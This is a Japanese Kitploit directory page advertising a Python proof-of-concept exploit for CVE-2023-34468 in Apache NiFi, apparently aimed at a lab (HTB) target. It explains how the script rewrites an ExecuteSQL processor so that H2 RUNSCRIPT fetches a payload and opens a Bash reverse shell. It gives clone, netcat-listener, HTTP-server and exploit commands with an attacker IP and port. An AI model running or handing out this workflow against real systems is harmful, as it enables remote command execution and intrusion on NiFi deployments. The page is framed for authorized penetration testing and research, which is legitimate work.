Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-34468 — CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC | Kitploit
ツール/GitHubGitHub/ozcanpng/cve-2023-34468
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミングペイロード開発
GitHubozcanpng/cve-2023-34468

CVE-2023-34468

CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

リポジトリを見る
31ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-34468 — Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

編集可能なApache NiFi ExecuteSQLプロセッサを悪用し、H2のRUNSCRIPTペイロードを使用してBashリバースシェル経由でリモートコマンド実行を誘発する、短いPythonのPoCです。

認可されたテストおよび研究目的のみに使用してください。所有していない、または明示的なテスト許可を得ていないシステムに対して使用しないでください。


動作概要

root@kitploit:~
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
  1. 自動的に単一のExecuteSQLプロセッサを発見するか、手動で--processor-idを受け付けます。
  2. Javaベースのシェル実行エイリアスを定義して呼び出す、ローカルのrce.sqlペイロードを作成します。
  3. 自身のncリスナーとHTTPサーバーを起動するよう促します。
  4. H2のRUNSCRIPTを介してrce.sqlをフェッチするようにプロセッサクエリを更新します。
  5. プロセッサを開始してリバースシェルを誘発します。
  6. シェルが確立されたことを確認した後、プロセッサの元の設定を復元します。

スクリーンショット

ツールをダウンロード

1. セットアップ

セットアップ

2. ペイロードへのリクエスト

エクスプロイト実行

3. シェル受信

プロセッサ更新

4. 結果

結果


セットアップ

root@kitploit:~
git clone https://github.com/ozcanpng/CVE-2023-34468.git
cd CVE-2023-34468
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

使用方法

ターミナル1:

root@kitploit:~
rlwrap nc -lvnp 4444

ターミナル2(このリポジトリのディレクトリから):

root@kitploit:~
python3 -m http.server 8000

ターミナル3:

root@kitploit:~
python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444

手動でプロセッサを選択する場合:

root@kitploit:~
python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id <UUID> --lhost 10.10.16.53 --lport 4444

影響を受ける製品

製品影響を受けるバージョン必要なアクセス権影響
Apache NiFi編集可能なExecuteSQL/H2動作を使用するCVE-2023-34468の影響を受けるデプロイメントAPIを介して対象のNiFiプロセッサに到達し変更する能力リモートコマンド実行

注意事項

  • このスクリプトは、NiFi APIに到達可能であり、現在のユーザー/セッションが対象プロセッサを変更できることを前提としています。
  • 生成されたrce.sqlファイルはgitによって無視され、リポジトリディレクトリからpython3 -m http.serverで提供する必要があります。
  • 自動発見でプロセッサが見つからないか、複数の候補が見つかった場合は、--processor-idを使用してプロセッサUUIDを手動で指定してください。
  • スクリプトは、シェルが確立したことを確認した後、元のExecuteSQLプロセッサ設定を復元しようとします。

参考文献

  • NVD — CVE-2023-34468
  • Apache NiFi
  • H2データベースコマンド

著者

ozcanpng — github.com/ozcanpng — ozcanpng.dev